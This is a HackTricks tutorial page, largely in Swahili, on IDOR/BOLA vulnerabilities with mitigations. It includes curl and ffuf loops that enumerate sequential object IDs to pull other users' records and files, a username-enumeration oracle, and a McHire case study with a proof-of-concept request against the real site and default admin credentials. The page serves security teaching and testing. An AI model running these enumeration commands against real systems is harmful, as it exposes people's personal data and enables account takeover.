IDOR (Insecure Direct Object Reference)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) inaonekana wakati endpoint ya web au API inafichua au inakubali kitambulisho kinachodhibitiwa na mtumiaji ambacho kinatumika moja kwa moja kufikia object ya ndani bila kuthibitisha kuwa mwitoa anaidhinishwa kufikia/kuhariri object hiyo. Uvitaji unaofanikiwa kawaida huruhusu escalation ya vibali kwa usawa au wima, kama kusoma au kuhariri data za watumiaji wengine na, katika kesi mbaya kabisa, takeover ya akaunti kamili au mass-data exfiltration.

1. Kutambua IDOR Zenyewezekana

1. Tafuta vigezo vinavyoashiria kitu:

• Njia: /api/user/1234, /files/550e8400-e29b-41d4-a716-446655440000
• Query: ?id=42, ?invoice=2024-00001
• Mwili / JSON: {"user_id": 321, "order_id": 987}
• Vichwa / Cookies: X-Client-ID: 4711

2. Prefer endpoints ambazo hunasoma au kusasisha data (GET, PUT, PATCH, DELETE).
3. Zingatia wakati vitambulisho ni mfululizo au vinavyoweza kutabiriwa – kama ID yako ni 64185742, basi 64185741 huenda ipo.
4. Chunguza mtiririko wa siri au mbadala (mfano: “Paradox team members” link kwenye kurasa za login) ambao unaweza kufichua API za ziada.
5. Tumia session iliyo authenticated yenye vibali vidogo na badilisha tu ID huku ukihifadhi token/cookie ile ile. Kutokuwapo kwa kosa la authorization kawaida ni dalili ya IDOR.

Quick manual tampering (Burp Repeater)

PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json

{"lead_id":64185741}

Uorodheshaji otomatiki (Burp Intruder / curl loop)

for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-H "Cookie: auth=$TOKEN" \
-d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
done

Kuorodhesha download IDs zinazotabirika (ffuf)

Paneli za kuhifadhi faili zilizoathibitishwa mara nyingi huhifadhi metadata kwa kila mtumiaji katika jedwali moja files na kutoa download endpoint kama /download.php?id=<int>. Ikiwa handler inakagua tu kama ID ipo (na si kama inamilikiwa na mtumiaji aliyethibitishwa), unaweza sweep integer space kwa session cookie yako halali na kuiba backups/configs za wapangaji wengine:

ffuf -u http://file.era.htb/download.php?id=FUZZ \
-H "Cookie: PHPSESSID=<session>" \
-w <(seq 0 6000) \
-fr 'File Not Found' \
-o hits.json
jq -r '.results[].url' hits.json    # fetch surviving IDs such as company backups or signing keys

• -fr removes 404-style templates so only true hits remain (e.g., IDs 54/150 leaking full site backups and signing material).
• The same FFUF workflow works with Burp Intruder or a curl loop—just ensure you stay authenticated while incrementing IDs.

Error-response oracle for user/file enumeration

When a download endpoint accepts both a username and a filename (e.g. /view.php?username=<u>&file=<f>), subtle differences in error messages often create an oracle:

• Username isiyokuwepo → “Mtumiaji haipatikani”
• Filename mbaya lakini extension sahihi → “Faili haipo” (mara nyingine pia huorodhesha faili zinazopatikana)
• Extension mbaya → kosa la uthibitisho

With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the “Mtumiaji haipatikani” string to discover valid users:

ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'

Baada ya kutambua majina ya watumiaji halali, omba mafaili maalum moja kwa moja (mfano, /view.php?username=amanda&file=privacy.odt). Muundo huu mara nyingi husababisha ufichaji usioidhinishwa wa nyaraka za watumiaji wengine na credential leakage.

2. Mfano wa Kesi Halisi – McHire Chatbot Platform (2025)

Wakati wa tathmini ya portal ya ajira iliyoendeshwa na Paradox.ai yenye McHire, IDOR ifuatayo iligunduliwa:

• Endpoint: PUT /api/lead/cem-xhr
• Authorization: cookie ya session ya mtumiaji kwa akaunti yoyote ya mtihani ya mgahawa
• Body parameter: {"lead_id": N} – kitambulisho cha nambari cha tarakimu 8, mfuatano

Kwa kupunguza lead_id, mtendaji wa mtihani alipata full PII za waombaji mbalimbali (jina, barua pepe, simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja iliyoruhusu session hijacking. Uorodheshaji wa safu 1 – 64,185,742 ulifunua takriban milioni 64 rekodi.

Proof-of-Concept request:

curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-d '{"lead_id":64185741}'

Pamoja na credentials za admin za default (123456:123456) ambazo ziliruhusu kupata akaunti ya majaribio, udhaifu ulisababisha uvujaji wa data mkubwa na wenye hatari kwa kampuni nzima.

3. Athari za IDOR / BOLA

• Kupanda kwa usawa (horizontal escalation) – kusoma/kuweka/kuharibu data za watumiaji wengine.
• Kupanda kwa mamlaka (vertical escalation) – mtumiaji mwenye ruhusa ndogo anapata uwezo uliotengwa kwa admin.
• Uvujaji mkubwa wa data ikiwa vitambulisho ni mfululizo (e.g., applicant IDs, invoices).
• Kuchukua udhibiti wa akaunti kwa kuiba tokens au kuweka upya passwords za watumiaji wengine.

4. Upunguzaji wa hatari na Mbinu Bora

1. Lazimisha uthibitisho wa ngazi ya kitu kwa kila ombi (user_id == session.user).
2. Tumia vitambulisho vya njia isiyo ya moja kwa moja na visivyo rahisi kukisia (UUIDv4, ULID) badala ya auto-increment IDs.
3. Fanya uthibitisho upande wa server, usitegemee hidden form fields au UI controls.
4. Tekeleza ukaguzi wa RBAC / ABAC katika middleware ya katikati.
5. Ongeza rate-limiting & logging ili kugundua enumeration ya IDs.
6. Fanya security testing kwa kila endpoint mpya (unit, integration, na DAST).

5. Zana

• BurpSuite extensions: Authorize, Auto Repeater, Turbo Intruder.
• OWASP ZAP: Auth Matrix, Forced Browse.
• Github projects: bwapp-idor-scanner, Blindy (bulk IDOR hunting).

References

• McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII
• OWASP Top 10 – Broken Access Control
• How to Find More IDORs – Vickie Li
• HTB Nocturnal: IDOR oracle → file theft
• 0xdf – HTB Era: predictable download IDs → backups and signing keys

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.